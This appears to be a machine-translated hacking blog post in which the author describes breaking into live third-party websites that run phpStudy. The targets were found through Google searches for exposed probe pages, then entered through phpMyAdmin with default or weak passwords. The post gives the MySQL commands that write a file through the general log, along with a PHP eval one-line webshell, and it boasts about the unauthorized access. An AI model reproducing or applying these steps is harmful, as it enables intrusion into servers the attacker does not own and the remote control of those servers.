(actual combat) Phpstudy Vulnerability + database log write Shell

The true intellect is the ambition of fortitude.

Today did not learn how many things, until the afternoon in the reading of other people's article when saw the key words of phpstudy0day, curiosity to check. In fact, this hole for some time, and then ready to try Google can also find a hole in the site, direct Google search Phpstudy probe 2014. The result is this, I have to sigh that Google is too strong.

I'm not going to look at the first few pages, basically it's been worn by the day, or the hole has been mended. So simply turn to the back, tell the truth luck is very important, I just tried the first site became.

First, click on the site to do this:

What we're going to use is this MySQL database connection detection function, we try weak password, also is the default user name password root root login try, if prompted

It means that the password is right and there is a chance to take it down, so next is the directory default/phpmyadmin login with the username and password above

Next is the method previously written to take the shell, in the database using the SELECT INTO OutFile method to write to the shell, very simple process is not written, the absolute path in the probe that page has.

Next to say is a wonderful station later encountered, just take down this station, ready to try another station, met I want to say this target station, when I opened the site, and did not display the PHP probe page, but echoed a content for the Hello World page, I TM .... No panic at all!

Since it is phpstudy, that in the attempt to phpmyadmin this directory, maybe this exists, the result of a test-bed slot, really. Instant I was happy, the mind is thinking that this administrator must have added a index.php page but still the default user name password, and then open happy heart to connect his database, the results prompt me 1045 error, this .... Wrong password?? Originally infiltrated this should be over, but handy to try the other weak password, the result, I used 123456 in the ... It's in!! I don't want to say anything about the IQ of this manager.

That's good. Next is the SELECT into outfile write Shell, and later found that I was wrong, this administrator is still a little security awareness, because outfile was banned, then I can not make this site! Does not exist, first we are rooted, then we can write to the shell in the log. Here's how:

show variables like ‘% general%’; #View configuration
set global general_log = on; #Enable general log mode
set global general_log_file = ‘C: /phpstudy/www/xx.php’; #Set the log directory to the shell address
select ‘<? php eval ($ _ POST [cmd]);?>‘ write to shell 

I also encountered a problem here, because I do not see the PHP probe so I do not know the absolute directory of the site, because Phpstudy installation, in the directory there is also a phpinfo.php file, access to this also can see the absolute path. (can also phpmyadmin blast path, etc.)

Hang a picture is purely to install force, (who let me not to the point of that Daniel, at this stage can only install force to encourage themselves ~) The rest is the chopper connection. The reason for this loophole Baidu a lot, here is not much to say.

This road is still a long and long to go, will be just the tip of the iceberg, I hope that they do not conceited, practical forward, mutual encouragement!

(actual combat) Phpstudy Vulnerability + database log write Shell